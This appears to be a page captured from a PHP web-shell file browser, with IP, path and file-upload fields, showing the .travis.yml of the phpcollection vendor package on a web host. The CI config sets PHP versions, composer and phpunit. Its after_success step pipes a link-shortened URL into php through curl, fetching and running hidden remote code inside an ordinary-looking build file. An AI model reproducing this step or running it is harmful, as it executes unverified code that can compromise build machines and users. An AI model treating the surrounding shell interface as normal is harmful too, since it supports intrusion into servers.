Your IP : 127.0.0.1


Current Path : /home/dev2.destoffenstraat.com-old1/vendor/phpcollection/phpcollection/
Upload File :
Current File : /home/dev2.destoffenstraat.com-old1/vendor/phpcollection/phpcollection/.travis.yml

language: php

php:
  - 5.3
  - 5.4
  - 5.5
  - hhvm

before_script:
  - wget http://getcomposer.org/composer.phar
  - php composer.phar install --dev

script: phpunit --coverage-clover clover

after_success:
  - curl -sL https://bit.ly/artifact-uploader | php

matrix:
  allow_failures:
    - php: hhvm